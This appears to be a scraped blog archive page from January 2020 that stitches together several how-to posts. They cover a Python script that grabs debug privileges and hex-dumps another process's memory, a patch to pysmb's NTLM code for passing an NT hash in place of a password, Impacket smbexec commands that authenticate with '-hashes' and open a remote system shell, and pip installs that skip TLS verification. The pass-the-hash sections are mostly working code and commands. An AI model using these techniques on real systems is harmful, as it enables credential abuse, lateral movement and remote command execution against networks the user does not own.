"""Hex-dump memory pages of another process with kernel32.ReadProcessMemory.

Flow: enable SeBackup/SeDebug/SeSecurity on the current process token
(get_extra_privs), open the hard-coded ``pid`` with PROCESS_ALL_ACCESS, then
read 64 KiB at a time starting at the hard-coded ``address`` and print each
buffer as ``aa:bb:cc:...``.

NOTE(review): the listing is kept as written; a reader reusing it should
know about these defects first:
  * ``while address <= (address+0x1000000)`` can never become false (both
    sides move together), so the loop never terminates on its own.
  * ``buffer[ii] != 0x1`` compares a 1-byte ``bytes`` object with an int,
    which is always true in Python 3, so the full hex dump is printed once
    for every byte of every page (65536 times per page).
  * ``bytesRead`` is never consulted: the whole buffer is printed even when a
    read returned fewer bytes.
  * ``pid`` and ``address`` are literals that only made sense on the author's
    machine.

Needs the pywin32 package (win32security, win32api, win32con, ntsecuritycon).
"""
from ctypes import *
from ctypes.wintypes import *
import time
import os, sys        # unused in this listing
import win32security
import tempfile       # unused in this listing
import win32api, win32con
from ntsecuritycon import TokenSessionId, TokenSandBoxInert, TokenType, TokenImpersonationLevel, TokenVirtualizationEnabled, TokenVirtualizationAllowed, TokenHasRestrictions, TokenElevationType, TokenUIAccess, TokenUser, TokenOwner, TokenGroups, TokenRestrictedSids, TokenPrivileges, TokenPrimaryGroup, TokenSource, TokenDefaultDacl, TokenStatistics, TokenOrigin, TokenLinkedToken, TokenLogonSid, TokenElevation, TokenIntegrityLevel, TokenMandatoryPolicy, SE_ASSIGNPRIMARYTOKEN_NAME, SE_BACKUP_NAME, SE_CREATE_PAGEFILE_NAME, SE_CREATE_TOKEN_NAME, SE_DEBUG_NAME, SE_LOAD_DRIVER_NAME, SE_MACHINE_ACCOUNT_NAME, SE_RESTORE_NAME, SE_SHUTDOWN_NAME, SE_TAKE_OWNERSHIP_NAME, SE_TCB_NAME

# Raw kernel32 entry points. NOTE(review): no argtypes/restype are declared,
# so ctypes treats the handle and the address as C int; on a 64-bit build that
# truncates both -- confirm the interpreter bitness this was run under.
OpenProcess = windll.kernel32.OpenProcess
ReadProcessMemory = windll.kernel32.ReadProcessMemory
CloseHandle = windll.kernel32.CloseHandle


def get_extra_privs() -> None:
    """Enable SeBackup, SeDebug and SeSecurity on the current process token.

    AdjustTokenPrivileges can only switch on privileges the token already
    holds, so this is effectively a no-op unless the process runs as an
    administrator. The call's return value is passed through str() and
    discarded, so a failure is silent; nothing is raised and nothing is
    returned.
    """
    # Try to give ourselves some extra privs (only works if we're admin):
    # SeBackupPrivilege - so we can read anything
    # SeDebugPrivilege - so we can find out about other processes (otherwise OpenProcess will fail for some)
    # SeSecurityPrivilege - the "Manage auditing and security log" right; nothing in this script uses it
    # Problem: Vista+ support "Protected" processes, e.g. audiodg.exe. We can't see info about these.
    # Interesting post on why Protected Process aren't really secure anyway: http://www.alex-ionescu.com/?p=34
    th = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32con.TOKEN_ADJUST_PRIVILEGES | win32con.TOKEN_QUERY)
    # Each entry is a (LUID, attributes) tuple for a privilege the token holds.
    privs = win32security.GetTokenInformation(th, TokenPrivileges)
    newprivs = []
    for privtuple in privs:
        # The three LUIDs are looked up again on every iteration; hoisting
        # them out of the loop would be a free win.
        if privtuple[0] == win32security.LookupPrivilegeValue(None, "SeBackupPrivilege") or privtuple[0] == win32security.LookupPrivilegeValue(None, "SeDebugPrivilege") or privtuple[0] == win32security.LookupPrivilegeValue(None, "SeSecurityPrivilege"):
            print("Added privilege " + str(privtuple[0]))
            # privtuple[1] = 2 # tuples are immutable. WHY?!
            newprivs.append((privtuple[0], 2))  # 2 == SE_PRIVILEGE_ENABLED
        else:
            # Keep every other privilege in whatever state it already has.
            newprivs.append((privtuple[0], privtuple[1]))
    # Adjust privs
    privs = tuple(newprivs)
    # Result is discarded, so a partial or failed adjustment is not reported.
    str(win32security.AdjustTokenPrivileges(th, False, privs))


# Requests every access right on the target. The loop below only reads memory;
# per the Win32 docs ReadProcessMemory needs PROCESS_VM_READ, so this is far
# more than least privilege calls for.
PROCESS_ALL_ACCESS = 0x1F0FFF
pid = 1012  # I assume you have this from somewhere.
#address = 0x1000000 # Likewise; for illustration I'll get the .exe header.
address = 0x4100000
buffer = create_string_buffer(0x10000)
# len() of the ctypes array is its full 0x10000 size; the commented-out
# alternative would stop at the first NUL byte.
bufferSize = len(buffer)  #len(buffer.value)
bytesRead = c_ulong(0)
get_extra_privs()
processHandle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
if processHandle:
    print("Buffersize: ", bufferSize)
    time.sleep(3)  # purpose of the pause is not stated by the author
    # NOTE(review): this condition is always true -- see module docstring.
    while address <= (address+0x1000000):
        if ReadProcessMemory(processHandle, address, buffer, bufferSize, byref(bytesRead)):
            for ii in range(0, bufferSize):
                # NOTE(review): bytes-vs-int comparison, always true in Python 3.
                if (buffer[ii] != 0x1):
                    #print("Success:", address, buffer)
                    print("Success:", hex(address))
                    #print("b'" + ''.join('\\x{:02x}'.format(x) for x in buffer) + "'")
                    # Iterating the char array yields 1-byte bytes objects, hence ord().
                    print(":".join("{:02x}".format(ord(c)) for c in buffer))
                    continue
        else:
            # Only the address is reported; the Win32 error code
            # (GetLastError) is not fetched.
            print("Failed@", hex(address))
        address += 0x1000
    CloseHandle(processHandle)
else:
    # processHandle is 0 here; the reason is in GetLastError(), which is not fetched.
    print("Unable to open process: ", processHandle)
Monthly Archives: January 2020
Passing the Hash with Python SMB
Run `git clone https://github.com/miketeo/pysmb.git`, then `python setup.py install` inside the clone. Then drop this in test.py:
"""List the shares of a remote SMB host with pysmb, authenticating by NT hash.

The second SMBConnection argument is not a clear-text password here: with the
leading ``!`` it is read as the hex NT hash by the patched
``generateChallengeResponseV2`` in pysmb's ntlm.py shown further down this
page.  An NT hash is credential-equivalent, so a real one must never be
committed in a script like this; the value below is a placeholder.
"""
import sys
import pprint
from smb.SMBConnection import SMBConnection
from util import getConnectionInfo

conn = SMBConnection(
    "UserAccount",
    "!31:70:ae:1e:3e:NT:LM:Hash:Goes:Here:a9:37:fc:e3",
    "Your IP Here",
    "RemoteHostname",
    use_ntlm_v2=True,
    is_direct_tcp=True,
)
#Use IS TCP Direct on 445 and 135 for the other
conn.connect("RemoteHostName", 445)

results = conn.listShares()
share_names = [share.name.lower() for share in results]
for share_name in share_names:
    print(share_name)

# Left by the author for debugging and for the next step:
#   pprint.pprint(sys.modules)                         # pretty print loaded modules
#   filelist = conn.listPath('shared_folder_name', '/')
Modify this code in Python\pysmb\python3\smb -> ntlm.py
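def generateChallengeResponseV2(password, user, server_challenge, server_info, domain='', client_challenge=None):
    """Compute the NTLMv2 NT/LM challenge responses and the session base key.

    Args:
        password: the account password; when it starts with ``!`` the rest is
            taken as the hex NT hash itself (``:`` separators allowed) and the
            MD4 step is skipped.
        user: account name; upper-cased before keying, as [MS-NLMP] requires.
        server_challenge: 8-byte server nonce from the CHALLENGE message.
        server_info: the target-info (AV_PAIR) blob echoed from the server.
        domain: domain name appended to the upper-cased user name.
        client_challenge: optional 8-byte client nonce; drawn from the OS
            CSPRNG when omitted.

    Returns:
        ``(nt_challenge_response, lm_challenge_response, session_key)`` as
        ``bytes``.

    Raises:
        ValueError: if ``client_challenge`` is not exactly 8 bytes, or a
            ``!``-prefixed hash does not decode to 16 bytes.
    """
    client_timestamp = b'\0' * 8  # timestamp field is left zero
    if not client_challenge:
        # random.getrandbits() is not a CSPRNG; SystemRandom is os.urandom-backed.
        sysrand = random.SystemRandom()
        client_challenge = bytes(sysrand.getrandbits(8) for _ in range(8))
    if len(client_challenge) != 8:
        raise ValueError("client_challenge must be exactly 8 bytes")

    if password.startswith("!"):
        ntlm_hash = bytes.fromhex(password[1:].replace(":", ""))
        if len(ntlm_hash) != 16:
            raise ValueError("NT hash must decode to 16 bytes")
    else:
        d = MD4()
        d.update(password.encode('UTF-16LE'))
        ntlm_hash = d.digest()  # The NT password hash
    # Never print or log ntlm_hash: it is equivalent to the password.

    # The NTLMv2 password hash. In [MS-NLMP], this is the result of NTOWFv2 and LMOWFv2 functions
    response_key = hmac.new(ntlm_hash, (user.upper() + domain).encode('UTF-16LE'), 'md5').digest()
    temp = b'\x01\x01' + b'\0'*6 + client_timestamp + client_challenge + b'\0'*4 + server_info
    ntproofstr = hmac.new(response_key, server_challenge + temp, 'md5').digest()
    nt_challenge_response = ntproofstr + temp
    lm_challenge_response = hmac.new(response_key, server_challenge + client_challenge, 'md5').digest() + client_challenge
    session_key = hmac.new(response_key, ntproofstr, 'md5').digest()
    return nt_challenge_response, lm_challenge_response, session_key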
Z:\Programming\Python\pysmb\python3\tests\SMBConnectionTests>test.py File "Z:\Programming\Python\pysmb\python3\tests\SMBConnectionTests\test.py", line 7, in conn.connect("Hostname", 445) File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\SMBConnection.py", line 124, in connect self._pollForNetBIOSPacket(timeout) File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\SMBConnection.py", line 634, in _pollForNetBIOSPacket self.feedData(data) File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\nmb\base.py", line 54, in feedData self._processNMBSessionPacket(self.data_nmb) File "C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\nmb\base.py", line 75, in _processNMBSessionPacket …
Installing Impacket
git clone https://github.com/SecureAuthCorp/impacket.git pip install --upgrade pip --trusted-host pypi.org --trusted-host files.pythonhosted.org . python smbclient.py https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ python setup.py install Python\impacket\examples>python smbclient.py or Python\impacket\examples>smbclient.py smbexec.py Domain/Username:YourPassword@HostOfServer or \Python\impacket\examples>smbexec.py Domain/Username@ServerHostname -hashes E52CLMHASHGOESHERE168F41AFC3A96:3170221NTLMHASHGOESHERE937FCE3 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32>set But you can really just use this "smbexec.py Domain/Username@ServerHostname -hashes …
Python Code for Passing the Hash
Install PIP and run
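# --trusted-host makes pip skip TLS certificate verification for these hosts,
# so anyone on the network path could substitute packages. Use it only behind
# a TLS-intercepting proxy you control, and prefer installing that proxy's CA
# (pip --cert / PIP_CERT) so verification can stay on.
pip install rdpy --trusted-host pypi.org --trusted-host files.pythonhosted.org
pip install pyinstaller --trusted-host pypi.org --trusted-host files.pythonhosted.org
pip install pywin32 --trusted-host pypi.org --trusted-host files.pythonhosted.org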
or
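# Clone the repository, then run the installer from inside the clone.
git clone https://github.com/citronneur/rdpy.git
cd rdpy
python setup.py install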
For Python 2.7: then install PyQt4 from here (note that this only works on 2.7) -> https://pypi.org/project/PyQt4/ You may also get the link from here, https://github.com/citronneur/rdpy (in the Windows section). (This will not work on Python 3 and will error out; it is for 2.7 only.) For Python 3.8+, run this …
Install Visual Studio 6 on Windows 10
http://nuke.vbcorner.net/Articles/VB60/VisualStudio6Installer/tabid/93/language/en-US/Default.aspx Recommendation Minimize 03/24/2016 Important note for Windows 10, Windows 7, Windows XP SP3 You must install and run VS6Installer 5.x 'as administrator', otherwise you get an error. Right-click on VS6Installer.exe -> Run As Administrator If you have already tried to install VB 6.0 before using VS6 Installer, then you must: uninstall VB 6.0 and …